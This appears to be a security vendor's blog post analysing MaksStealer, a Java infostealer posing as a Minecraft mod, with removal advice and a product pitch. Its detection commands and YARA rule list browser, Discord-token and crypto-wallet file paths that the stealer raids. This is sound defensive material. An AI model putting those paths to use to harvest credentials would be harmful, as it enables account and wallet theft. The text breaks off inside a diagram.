{"id":31021,"date":"2025-05-20T16:58:18","date_gmt":"2025-05-20T16:58:18","guid":{"rendered":"https:\/\/gridinsoft.com\/blogs\/?p=31021"},"modified":"2025-05-20T17:17:36","modified_gmt":"2025-05-20T17:17:36","slug":"maksstealer-malware-analysis-removal","status":"publish","type":"post","link":"https:\/\/gridinsoft.com\/blogs\/maksstealer-malware-analysis-removal\/","title":{"rendered":"MaksStealer (MaxCoffe): The Minecraft Mod That&#8217;s Actually Stealing Your Passwords"},"content":{"rendered":"<p><strong>For Minecraft Gamers<\/strong>: MaxCoffe masquerading as a Minecraft performance enhancer! MaksStealer is an information-stealing trojan targeting Minecraft players, especially those on the popular Hypixel SkyBlock server. It promises to boost your gameplay or provide cheats but actually runs off with your passwords, crypto, and Discord account.<\/p>\r\n<p>I&#8217;ve analyzed dozens of these gaming-related malware strains, and this one is particularly sneaky. Let&#8217;s break down what MaksStealer is, how it works, and most importantly &#8211; how to kick it off your system before it empties your crypto wallets.<\/p>\r\n\r\n    <h2>MaksStealer Malware<\/h2>\r\n    <table class=\"table-summary\">\r\n        <tr>\r\n            <td>Threat Type<\/td>\r\n            <td>Information Stealer, Trojan<\/td>\r\n        <\/tr>\r\n        <tr>\r\n            <td>Disguise<\/td>\r\n            <td>Minecraft Hypixel SkyBlock performance mod\/cheat<\/td>\r\n        <\/tr>\r\n        <tr>\r\n            <td>What It Steals<\/td>\r\n            <td>Browser credentials, Discord tokens, cryptocurrency wallets<\/td>\r\n        <\/tr>\r\n        <tr>\r\n            <td>Distribution<\/td>\r\n            <td>Gaming forums, YouTube comments, Discord servers, pirated software<\/td>\r\n        <\/tr>\r\n        <tr>\r\n            <td>Detection Names<\/td>\r\n            <td>Trojan.MaxCoffe, Trojan.GenericKD.76438532, Java\/MaksRat.B, HEUR:Trojan-PSW.Java.Stealer.gen<\/td>\r\n        <\/tr>\r\n        <tr>\r\n            <td>Risk Level<\/td>\r\n            <td>High (financial loss, account theft, privacy breach)<\/td>\r\n        <\/tr>\r\n    <\/table>\r\n\r\n\r\n<svg width=\"100%\" height=\"420\" viewBox=\"0 0 800 420\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\">\r\n    <!-- Title -->\r\n    <text x=\"400\" y=\"40\" font-family=\"Arial, sans-serif\" font-size=\"18\" font-weight=\"bold\" text-anchor=\"middle\" fill=\"#333\">MaksStealer Infection<\/text>\r\n    \r\n    <!-- Background -->\r\n    <rect x=\"50\" y=\"70\" width=\"700\" height=\"300\" fill=\"#f8f8f8\" stroke=\"#ddd\" stroke-width=\"1\" \/>\r\n    \r\n    <!-- Flow Chart Elements -->\r\n    <rect x=\"100\" y=\"100\" width=\"160\" height=\"70\" rx=\"5\" fill=\"#333\" \/>\r\n    <text x=\"180\" y=\"135\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">Gaming Forums<\/text>\r\n    <text x=\"180\" y=\"155\" font-family=\"Arial, sans-serif\" font-size=\"12\" text-anchor=\"middle\" fill=\"#fff\">&#8220;Free Minecraft Mods&#8221;<\/text>\r\n    \r\n    <rect x=\"320\" y=\"100\" width=\"160\" height=\"70\" rx=\"5\" fill=\"#555\" \/>\r\n    <text x=\"400\" y=\"135\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">Download .JAR File<\/text>\r\n    <text x=\"400\" y=\"155\" font-family=\"Arial, sans-serif\" font-size=\"12\" text-anchor=\"middle\" fill=\"#fff\">&#8220;CasinoEssentials.jar&#8221;<\/text>\r\n    \r\n    <rect x=\"540\" y=\"100\" width=\"160\" height=\"70\" rx=\"5\" fill=\"#777\" \/>\r\n    <text x=\"620\" y=\"135\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">User Runs the Mod<\/text>\r\n    <text x=\"620\" y=\"155\" font-family=\"Arial, sans-serif\" font-size=\"12\" text-anchor=\"middle\" fill=\"#fff\">&#8220;Java -jar filename.jar&#8221;<\/text>\r\n    \r\n    <rect x=\"100\" y=\"230\" width=\"160\" height=\"70\" rx=\"5\" fill=\"#555\" \/>\r\n    <text x=\"180\" y=\"265\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">Stealer Activates<\/text>\r\n    <text x=\"180\" y=\"285\" font-family=\"Arial, sans-serif\" font-size=\"12\" text-anchor=\"middle\" fill=\"#fff\">Runs in background<\/text>\r\n    \r\n    <rect x=\"320\" y=\"230\" width=\"160\" height=\"70\" rx=\"5\" fill=\"#777\" \/>\r\n    <text x=\"400\" y=\"265\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">Data Collection<\/text>\r\n    <text x=\"400\" y=\"285\" font-family=\"Arial, sans-serif\" font-size=\"12\" text-anchor=\"middle\" fill=\"#fff\">Browsers, Discord, Crypto<\/text>\r\n    \r\n    <rect x=\"540\" y=\"230\" width=\"160\" height=\"70\" rx=\"5\" fill=\"#333\" \/>\r\n    <text x=\"620\" y=\"265\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">Data Exfiltration<\/text>\r\n    <text x=\"620\" y=\"285\" font-family=\"Arial, sans-serif\" font-size=\"12\" text-anchor=\"middle\" fill=\"#fff\">Sends to attacker servers<\/text>\r\n    \r\n    <!-- Arrows -->\r\n    <line x1=\"260\" y1=\"135\" x2=\"320\" y2=\"135\" stroke=\"#333\" stroke-width=\"2\" \/>\r\n    <polygon points=\"315,130 320,135 315,140\" fill=\"#333\" \/>\r\n    \r\n    <line x1=\"480\" y1=\"135\" x2=\"540\" y2=\"135\" stroke=\"#333\" stroke-width=\"2\" \/>\r\n    <polygon points=\"535,130 540,135 535,140\" fill=\"#333\" \/>\r\n    \r\n    <line x1=\"620\" y1=\"170\" x2=\"620\" y2=\"200\" stroke=\"#333\" stroke-width=\"2\" \/>\r\n    <line x1=\"620\" y1=\"200\" x2=\"180\" y2=\"200\" stroke=\"#333\" stroke-width=\"2\" \/>\r\n    <line x1=\"180\" y1=\"200\" x2=\"180\" y2=\"230\" stroke=\"#333\" stroke-width=\"2\" \/>\r\n    <polygon points=\"175,225 180,230 185,225\" fill=\"#333\" \/>\r\n    \r\n    <line x1=\"260\" y1=\"265\" x2=\"320\" y2=\"265\" stroke=\"#333\" stroke-width=\"2\" \/>\r\n    <polygon points=\"315,260 320,265 315,270\" fill=\"#333\" \/>\r\n    \r\n    <line x1=\"480\" y1=\"265\" x2=\"540\" y2=\"265\" stroke=\"#333\" stroke-width=\"2\" \/>\r\n    <polygon points=\"535,260 540,265 535,270\" fill=\"#333\" \/>\r\n<\/svg>\r\n<p class=\"chart-source\"><em>Source: Analysis of MaksStealer behavior from Triage and VirusTotal findings, May 2025<\/em><\/p>\r\n\r\n\r\n<h2>What Is MaksStealer and How Bad Is It?<\/h2>\r\n\r\n<p>MaksStealer is a Java-based information stealer that&#8217;s specifically targeting gamers. It masquerades as a performance enhancement mod or cheat for Minecraft&#8217;s Hypixel SkyBlock but is actually harvesting every piece of valuable data it can find. This malware is especially dangerous because it targets multiple data types at once &#8211; your passwords, gaming accounts, and cryptocurrency wallets.<\/p>\r\n\r\n<p>Unlike some malware that announces itself with annoying popups or system slowdowns, MaksStealer works silently in the background. You won&#8217;t even know it&#8217;s there until your accounts start getting hijacked or your crypto mysteriously disappears. That stealth factor makes it particularly dangerous for everyday users who aren&#8217;t constantly monitoring their system processes.<\/p>\r\n\r\n<h2>How This Digital Pickpocket Works<\/h2>\r\n\r\n<p>Once executed, MaksStealer immediately starts scanning your system for valuable data. It focuses on three main categories:<\/p>\r\n\r\n<h3>1. Web Browser Theft<\/h3>\r\n\r\n<p>MaksStealer doesn&#8217;t play favorites &#8211; it hits all major browsers. Chrome, Firefox, Edge, Opera, Brave, Vivaldi, and Yandex are all on its hit list. The malware expertly extracts saved passwords, cookies, autofill data, and browsing history from these browsers.<\/p>\r\n\r\n<p>Think about all those sites where you&#8217;ve clicked &#8220;remember password&#8221; for convenience. Banking sites, email, social media, online shopping &#8211; MaksStealer can now access all of them. It&#8217;s like handing over your entire digital identity on a silver platter.<\/p>\r\n\r\n<h3>2. Discord Account Targeting<\/h3>\r\n\r\n<p>For gamers, Discord is often the communication hub for everything. MaksStealer specifically looks for Discord authentication tokens stored on your computer. These tokens are basically digital keys to your Discord account.<\/p>\r\n\r\n<p>With your token, attackers can log into your Discord account without needing your password or bypassing two-factor authentication. They can then impersonate you, message your friends with malware links, join private servers, or access private conversations. This aspect is particularly effective for spreading the malware further through gaming communities.<\/p>\r\n\r\n<h3>3. Cryptocurrency Wallet Raiding<\/h3>\r\n\r\n<p>Perhaps most financially damaging is MaksStealer&#8217;s ability to target cryptocurrency wallets. It searches for popular wallet software like Armory, Bytecoin, Coinomi, Exodus, Ethereum, Electrum, Atomic Wallet, and many others. The malware extracts wallet files, private keys, and seed phrases.<\/p>\r\n\r\n<p>Once attackers have this data, your cryptocurrency can be transferred away in minutes. And due to the decentralized, anonymous nature of crypto transactions, these funds are virtually impossible to recover. One moment your digital wallet is full, the next it&#8217;s emptied with no recourse.<\/p>\r\n<figure id=\"attachment_31027\" aria-describedby=\"caption-attachment-31027\" style=\"width: 942px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/05\/maksstealer-browser-targets-942x1024.png\" alt=\"MaksStealer target browsers shown\" width=\"942\" height=\"1024\" class=\"size-large wp-image-31027\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/05\/maksstealer-browser-targets-942x1024.png 942w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/05\/maksstealer-browser-targets-276x300.png 276w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/05\/maksstealer-browser-targets-768x835.png 768w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/05\/maksstealer-browser-targets-1412x1536.png 1412w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/05\/maksstealer-browser-targets-860x935.png 860w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/05\/maksstealer-browser-targets-1536x1671.png 1536w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/05\/maksstealer-browser-targets.png 1598w\" sizes=\"auto, (max-width: 942px) 100vw, 942px\" \/><figcaption id=\"caption-attachment-31027\" class=\"wp-caption-text\">MaksStealer code showing targeted browsers for credential theft (Source: <a href=\"https:\/\/tria.ge\/250516-k46wfssjz7\" rel=\"nofollow noopener\" target=\"_blank\">Triage analysis<\/a>)<\/figcaption><\/figure>\r\n\r\n<h2>How MaksStealer Spreads: The Bait and Switch<\/h2>\r\n\r\n<p>Malware distributors are getting creative with their delivery methods. MaksStealer typically spreads through channels that gamers frequently use and trust:<\/p>\r\n\r\n<ul>\r\n    <li><strong>Gaming Forums:<\/strong> Posts claiming to offer performance enhancements or &#8220;legal&#8221; cheats for Minecraft<\/li>\r\n    <li><strong>YouTube Comments:<\/strong> Links in comment sections of Minecraft tutorials or gameplay videos<\/li>\r\n    <li><strong>Discord Servers:<\/strong> Malicious users sharing &#8220;exclusive&#8221; mods in gaming servers<\/li>\r\n    <li><strong>Unofficial Mod Sites:<\/strong> Fake or compromised websites hosting malicious JAR files<\/li>\r\n    <li><strong>Pirated Game Portals:<\/strong> Bundled with cracked game versions or key generators<\/li>\r\n<\/ul>\r\n\r\n<p>The common element is social engineering. The attackers know gamers are often looking for ways to enhance their gameplay or get an edge. They&#8217;re exploiting that desire by packaging their malware as something beneficial. It&#8217;s like offering someone a performance-enhancing drink that&#8217;s actually poison.<\/p>\r\n\r\n<p>What makes this distribution method particularly effective is that gamers are already accustomed to downloading and running third-party software. Minecraft&#8217;s massive modding community has created an environment where running JAR files is normalized. MaksStealer exploits this trust.<\/p>\r\n\r\n\r\n<svg width=\"100%\" height=\"420\" viewBox=\"0 0 800 420\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\">\r\n    <!-- Title -->\r\n    <text x=\"400\" y=\"40\" font-family=\"Arial, sans-serif\" font-size=\"18\" font-weight=\"bold\" text-anchor=\"middle\" fill=\"#333\">What MaksStealer Targets<\/text>\r\n    \r\n    <!-- Background -->\r\n    <rect x=\"100\" y=\"70\" width=\"600\" height=\"300\" fill=\"#f8f8f8\" stroke=\"#ddd\" stroke-width=\"1\" \/>\r\n    \r\n    <!-- Data Types -->\r\n    <rect x=\"150\" y=\"100\" width=\"500\" height=\"50\" rx=\"5\" fill=\"#333\" \/>\r\n    <text x=\"400\" y=\"130\" font-family=\"Arial, sans-serif\" font-size=\"16\" text-anchor=\"middle\" fill=\"#fff\">Browser Credentials<\/text>\r\n    \r\n    <rect x=\"150\" y=\"170\" width=\"500\" height=\"50\" rx=\"5\" fill=\"#555\" \/>\r\n    <text x=\"400\" y=\"200\" font-family=\"Arial, sans-serif\" font-size=\"16\" text-anchor=\"middle\" fill=\"#fff\">Discord Tokens<\/text>\r\n    \r\n    <rect x=\"150\" y=\"240\" width=\"500\" height=\"50\" rx=\"5\" fill=\"#777\" \/>\r\n    <text x=\"400\" y=\"270\" font-family=\"Arial, sans-serif\" font-size=\"16\" text-anchor=\"middle\" fill=\"#fff\">Cryptocurrency Wallets<\/text>\r\n    \r\n    <rect x=\"150\" y=\"310\" width=\"500\" height=\"50\" rx=\"5\" fill=\"#999\" \/>\r\n    <text x=\"400\" y=\"340\" font-family=\"Arial, sans-serif\" font-size=\"16\" text-anchor=\"middle\" fill=\"#fff\">System Information<\/text>\r\n    \r\n    <!-- Connection Lines -->\r\n    <line x1=\"150\" y1=\"125\" x2=\"120\" y2=\"125\" stroke=\"#333\" stroke-width=\"1\" \/>\r\n    <line x1=\"120\" y1=\"125\" x2=\"120\" y2=\"340\" stroke=\"#333\" stroke-width=\"1\" \/>\r\n    <line x1=\"120\" y1=\"340\" x2=\"150\" y2=\"340\" stroke=\"#333\" stroke-width=\"1\" \/>\r\n    <line x1=\"120\" y1=\"195\" x2=\"150\" y2=\"195\" stroke=\"#333\" stroke-width=\"1\" \/>\r\n    <line x1=\"120\" y1=\"265\" x2=\"150\" y2=\"265\" stroke=\"#333\" stroke-width=\"1\" \/>\r\n    \r\n    <!-- Indicators -->\r\n    <circle cx=\"120\" cy=\"125\" r=\"5\" fill=\"#333\" \/>\r\n    <circle cx=\"120\" cy=\"195\" r=\"5\" fill=\"#333\" \/>\r\n    <circle cx=\"120\" cy=\"265\" r=\"5\" fill=\"#333\" \/>\r\n    <circle cx=\"120\" cy=\"340\" r=\"5\" fill=\"#333\" \/>\r\n    \r\n    <!-- Browser Logos -->\r\n    <circle cx=\"680\" cy=\"100\" r=\"10\" fill=\"#666\" \/>\r\n    <text x=\"680\" y=\"104\" font-family=\"Arial, sans-serif\" font-size=\"10\" text-anchor=\"middle\" fill=\"#fff\">C<\/text>\r\n    <circle cx=\"680\" cy=\"125\" r=\"10\" fill=\"#666\" \/>\r\n    <text x=\"680\" y=\"129\" font-family=\"Arial, sans-serif\" font-size=\"10\" text-anchor=\"middle\" fill=\"#fff\">F<\/text>\r\n    <circle cx=\"680\" cy=\"150\" r=\"10\" fill=\"#666\" \/>\r\n    <text x=\"680\" y=\"154\" font-family=\"Arial, sans-serif\" font-size=\"10\" text-anchor=\"middle\" fill=\"#fff\">E<\/text>\r\n    \r\n    <!-- Wallet Icons -->\r\n    <rect x=\"670\" y=\"240\" width=\"20\" height=\"10\" rx=\"2\" fill=\"#666\" \/>\r\n    <rect x=\"670\" y=\"255\" width=\"20\" height=\"10\" rx=\"2\" fill=\"#666\" \/>\r\n    <rect x=\"670\" y=\"270\" width=\"20\" height=\"10\" rx=\"2\" fill=\"#666\" \/>\r\n<\/svg>\r\n<p class=\"chart-source\"><em>Source: Data types targeted by MaksStealer based on behavioral analysis<\/em><\/p>\r\n\r\n\r\n<h2>Warning Signs Your System Might Be Infected<\/h2>\r\n\r\n<p>MaksStealer is designed to operate stealthily, but there are some subtle signs that might indicate infection:<\/p>\r\n\r\n<ul>\r\n    <li><strong>Unexplained Account Activity:<\/strong> Logins to your accounts from unknown locations or devices<\/li>\r\n    <li><strong>Missing Cryptocurrency:<\/strong> Unexplained transactions or emptied wallets<\/li>\r\n    <li><strong>Strange Discord Messages:<\/strong> Messages sent from your account that you didn&#8217;t write<\/li>\r\n    <li><strong>Performance Issues:<\/strong> While running in the background, MaksStealer may cause slight system slowdowns<\/li>\r\n    <li><strong>Unusual Network Traffic:<\/strong> Increased data usage when you&#8217;re not actively downloading<\/li>\r\n    <li><strong>Java Process Running:<\/strong> Unexpected Java processes in your task manager after running a Minecraft mod<\/li>\r\n<\/ul>\r\n\r\n<p>If you notice any of these signs after downloading and running a new Minecraft mod or tool, you should act immediately. Information stealers work quickly, so every minute counts in preventing further data theft.<\/p>\r\n\r\n<p>You can check for suspicious Java processes using this PowerShell command:<\/p>\r\n\r\n<pre class=\"brush: powershell; title: ; notranslate\" title=\"\">\r\n# Check for suspicious Java processes\r\nGet-Process | Where-Object {$_.ProcessName -like &quot;*java*&quot;} | \r\nSelect-Object ProcessName, Id, StartTime, Path | \r\nFormat-Table -AutoSize\r\n\r\n# Look specifically for processes with MaxCoffe in command line (if advanced)\r\nGet-WmiObject Win32_Process | Where-Object {$_.CommandLine -like &quot;*MaxCoffe*&quot; -or $_.CommandLine -like &quot;*Coffe*&quot;} | \r\nSelect-Object ProcessId, Name, CommandLine\r\n<\/pre>\r\n\r\n<p>Suspicious indicators include Java processes running from temporary directories, recently started Java processes that you don&#8217;t recognize, or processes with &#8220;MaxCoffe&#8221; in their command line.<\/p>\r\n\r\n<p>For Linux or Mac users, you can use this Bash command:<\/p>\r\n\r\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\n# List all Java processes with details\r\nps aux | grep -i java\r\n\r\n# Check for suspicious Java processes with MaxCoffe or Coffe in their arguments\r\nps aux | grep -i java | grep -E &quot;MaxCoffe|Coffe&quot;\r\n\r\n# Check for recently modified Java-related files (last 7 days)\r\nfind ~\/ -name &quot;*.jar&quot; -mtime -7 -ls 2&gt;\/dev\/null\r\n<\/pre>\r\n\r\n<p>Security researchers can also use this YARA rule to detect potential MaksStealer samples:<\/p>\r\n\r\n<pre class=\"brush: yaml; title: ; notranslate\" title=\"\">\r\nrule MaksStealer_Java_InfoStealer {\r\n    meta:\r\n        description = &quot;Detects MaksStealer Java information stealer&quot;\r\n        author = &quot;GridinSoft Security Researcher&quot;\r\n        date = &quot;2025-05&quot;\r\n        severity = &quot;high&quot;\r\n        hash = &quot;9a17f87dcd2208f8f62ed76a15a6c52817008e77179c8b1f7f39c079d419f398&quot;\r\n\r\n    strings:\r\n        $mod_header = &quot;@Mod&quot; ascii\r\n        $mod_id = &quot;modid = \\&quot;MaxCoffe\\&quot;&quot; ascii\r\n        \r\n        $browser1 = &quot;\\\\Google\\\\Chrome\\\\User Data&quot; ascii\r\n        $browser2 = &quot;\\\\Mozilla\\\\Firefox\\\\Profiles&quot; ascii\r\n        $browser3 = &quot;\\\\BraveSoftware\\\\Brave-Browser&quot; ascii\r\n        \r\n        $discord1 = &quot;\\\\discord\\\\Local Storage\\\\leveldb&quot; ascii\r\n        $discord2 = &quot;\\\\discordcanary\\\\Local Storage\\\\leveldb&quot; ascii\r\n        \r\n        $crypto1 = &quot;\\\\Bitcoin\\\\wallet.dat&quot; ascii\r\n        $crypto2 = &quot;\\\\Ethereum\\\\keystore&quot; ascii\r\n        $crypto3 = &quot;\\\\Electrum\\\\wallets&quot; ascii\r\n        \r\n        $obf_pattern1 = &quot;lIIl(&quot; ascii\r\n        $obf_pattern2 = &quot;lII&#x5B;lll&#x5B;&quot; ascii\r\n\r\n    condition:\r\n        $mod_header and $mod_id and\r\n        (2 of ($browser*)) and\r\n        (1 of ($discord*)) and\r\n        (1 of ($crypto*)) and\r\n        (1 of ($obf_pattern*))\r\n}\r\n<\/pre>\r\n\r\n<h2>How to Remove MaksStealer From Your System<\/h2>\r\n\r\n<p>If you suspect you&#8217;ve been infected with MaksStealer, follow these steps to remove it:<\/p>\r\n\r\n<h3>Step 1: Disconnect from the Internet<\/h3>\r\n\r\n<p>Immediately disconnect your computer from the internet. This prevents the malware from sending more of your data to the attackers&#8217; servers or receiving additional commands. You can reconnect once the malware is removed.<\/p>\r\n\r\n<h3>Step 2: Scan with Antimalware Software<\/h3>\r\n\r\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main.webp\" alt=\"GridinSoft Anti-Malware main screen\" width=\"886\" height=\"689\" class=\"aligncenter size-full wp-image-22665\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main.webp 886w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main-300x233.webp 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main-768x597.webp 768w\" sizes=\"auto, (max-width: 886px) 100vw, 886px\" \/>\n<p>Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.<\/p>\n<div style=\"text-align:center\"><a href=\"\/download\/antimalware\" class=\"btn border-black\" rel=\"nofollow\">Download Anti-Malware<\/a><\/div>\n<p>After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click \"Advanced mode\" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.<\/p>\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result.webp\" alt=\"Scan results screen\" width=\"886\" height=\"689\" class=\"aligncenter size-full wp-image-22666\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result.webp 886w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result-300x233.webp 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result-768x597.webp 768w\" sizes=\"auto, (max-width: 886px) 100vw, 886px\" \/>\n<p>Click \"Clean Now\" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.<\/p>\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean.webp\" alt=\"Removal finished\" width=\"886\" height=\"689\" class=\"aligncenter size-full wp-image-22667\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean.webp 886w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean-300x233.webp 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean-768x597.webp 768w\" sizes=\"auto, (max-width: 886px) 100vw, 886px\" \/>\r\n\r\n<p>After scanning with anti-malware software, you might want to perform additional manual cleanup. Here&#8217;s a batch script that can help remove common MaksStealer artifacts:<\/p>\r\n\r\n\r\n\r\n<h3>Step 3: Reset Your Passwords and Secure Accounts<\/h3>\r\n\r\n<p>After removing the malware, immediately change passwords for all your important accounts. Start with email accounts, banking websites, and cryptocurrency platforms. Use a different device for these password changes if possible, as keyloggers might still be active.<\/p>\r\n\r\n<p>Enable two-factor authentication on all accounts that support it. This provides an additional layer of security even if your passwords are compromised. For Discord specifically, generate a new token by logging out and back in on all devices.<\/p>\r\n\r\n<h3>Step 4: Secure Your Cryptocurrency<\/h3>\r\n\r\n<p>If you have cryptocurrency wallets, create new wallets with fresh keys and transfer any remaining funds immediately. Consider the old wallets permanently compromised. Hardware wallets are a more secure option for storing significant cryptocurrency amounts, as they&#8217;re not vulnerable to this type of malware.<\/p>\r\n\r\n<h2>How to Protect Yourself From Information Stealers<\/h2>\r\n\r\n<p>Prevention is always better than cure, especially with information stealers. Here&#8217;s how to stay safe:<\/p>\r\n\r\n<ul>\r\n    <li><strong>Download mods only from official sources<\/strong> like CurseForge or the official Minecraft forums<\/li>\r\n    <li><strong>Be suspicious of &#8220;too good to be true&#8221; mods<\/strong> offering extraordinary features or cheats<\/li>\r\n    <li><strong>Keep your system and antivirus updated<\/strong> to protect against known threats<\/li>\r\n    <li><strong>Use a password manager<\/strong> instead of saving passwords in your browser<\/li>\r\n    <li><strong>Enable two-factor authentication<\/strong> on all important accounts<\/li>\r\n    <li><strong>Consider a hardware wallet<\/strong> for storing significant amounts of cryptocurrency<\/li>\r\n    <li><strong>Scan downloaded files<\/strong> with antivirus before executing them<\/li>\r\n    <li><strong>Be cautious of links in Discord servers, YouTube comments, and forums<\/strong> from unknown users<\/li>\r\n<\/ul>\r\n\r\n<p>Remember that Java files (.JAR) are executable programs. Treat them with the same caution you would any EXE file. Just because it&#8217;s labeled as a &#8220;mod&#8221; doesn&#8217;t mean it&#8217;s safe.<\/p>\r\n\r\n<h2>Similar Threats to Watch Out For<\/h2>\r\n\r\n<p>MaksStealer isn&#8217;t the only threat targeting gamers and cryptocurrency users. Stay alert for these similar threats:<\/p>\r\n\r\n<ul>\r\n    <li><a href=\"https:\/\/gridinsoft.com\/blogs\/stilachirat-crypto-stealer\/\">StilachiRAT Crypto Stealer<\/a> &#8211; Another dangerous cryptocurrency stealer targeting multiple wallets<\/li>\r\n    <li><a href=\"https:\/\/gridinsoft.com\/blogs\/infostealers-detect-remove-prevent\/\">How to Detect, Remove and Prevent Infostealers<\/a> &#8211; Comprehensive guide on information stealers<\/li>\r\n    <li><a href=\"https:\/\/gridinsoft.com\/blogs\/5-dangers-cracked-games\/\">5 Dangers of Cracked Games<\/a> &#8211; Why downloading pirated games puts you at risk<\/li>\r\n    <li><a href=\"https:\/\/gridinsoft.com\/blogs\/redenergy-stealer-as-a-ransomware\/\">RedEnergy Stealer\/Ransomware<\/a> &#8211; Multi-function malware that steals data and encrypts files<\/li>\r\n    <li><a href=\"https:\/\/gridinsoft.com\/blogs\/legion-stealer-targeting-pubg-players\/\">Legion Stealer Targeting PUBG Players<\/a> &#8211; Similar gaming-focused information stealer<\/li>\r\n<\/ul>\r\n\r\n<h2>How MaksStealer Works<\/h2>\r\n\r\n<p>The moment you run that innocent-looking mod, MaksStealer kicks into high gear. It doesn&#8217;t mess around. The malware launches its reconnaissance mission across your system, hunting for valuable data to steal.<\/p>\r\n\r\n\r\n<div class=\"wacatac-statistics-charts\">\r\n    <svg width=\"100%\" height=\"500\" viewBox=\"0 0 800 500\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\">\r\n        <!-- Title -->\r\n        <text x=\"400\" y=\"40\" font-family=\"Arial, sans-serif\" font-size=\"20\" font-weight=\"bold\" text-anchor=\"middle\" fill=\"#333\">MaksStealer Browser Credential Theft<\/text>\r\n        \r\n        <!-- Background -->\r\n        <rect x=\"50\" y=\"70\" width=\"700\" height=\"400\" fill=\"#f8f8f8\" stroke=\"#ddd\" stroke-width=\"1\" \/>\r\n        \r\n        <!-- Main malware components -->\r\n        <rect x=\"90\" y=\"100\" width=\"170\" height=\"60\" rx=\"5\" fill=\"#333\" \/>\r\n        <text x=\"175\" y=\"135\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">MaxCoffe (Entry Point)<\/text>\r\n        <text x=\"175\" y=\"155\" font-family=\"Arial, sans-serif\" font-size=\"10\" text-anchor=\"middle\" fill=\"#fff\">@Mod(modid = &#8220;MaxCoffe&#8221;, version = &#8220;1.1.7&#8221;)<\/text>\r\n        \r\n        <rect x=\"315\" y=\"100\" width=\"170\" height=\"60\" rx=\"5\" fill=\"#555\" \/>\r\n        <text x=\"400\" y=\"135\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">Coffe Class (Stealer)<\/text>\r\n        <text x=\"400\" y=\"155\" font-family=\"Arial, sans-serif\" font-size=\"10\" text-anchor=\"middle\" fill=\"#fff\">Obfuscated Credential Theft<\/text>\r\n        \r\n        <rect x=\"540\" y=\"100\" width=\"170\" height=\"60\" rx=\"5\" fill=\"#777\" \/>\r\n        <text x=\"625\" y=\"135\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">Data Exfiltration<\/text>\r\n        <text x=\"625\" y=\"155\" font-family=\"Arial, sans-serif\" font-size=\"10\" text-anchor=\"middle\" fill=\"#fff\">Session\/Token Transmission<\/text>\r\n        \r\n        <!-- Browser target section -->\r\n        <rect x=\"90\" y=\"210\" width=\"620\" height=\"160\" rx=\"5\" fill=\"#f0f0f0\" stroke=\"#ccc\" stroke-width=\"1\" \/>\r\n        <text x=\"400\" y=\"230\" font-family=\"Arial, sans-serif\" font-size=\"16\" font-weight=\"bold\" text-anchor=\"middle\" fill=\"#333\">Browser Targeting Logic (Decompiled)<\/text>\r\n        \r\n        <!-- Code snippets showing browser targeting -->\r\n        <rect x=\"100\" y=\"240\" width=\"290\" height=\"120\" rx=\"3\" fill=\"#fff\" stroke=\"#ddd\" stroke-width=\"1\" \/>\r\n        <text x=\"110\" y=\"260\" font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">\/\/ Targeting Multiple Browsers<\/text>\r\n        <text x=\"110\" y=\"275\" font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">lII[lll[7]] = 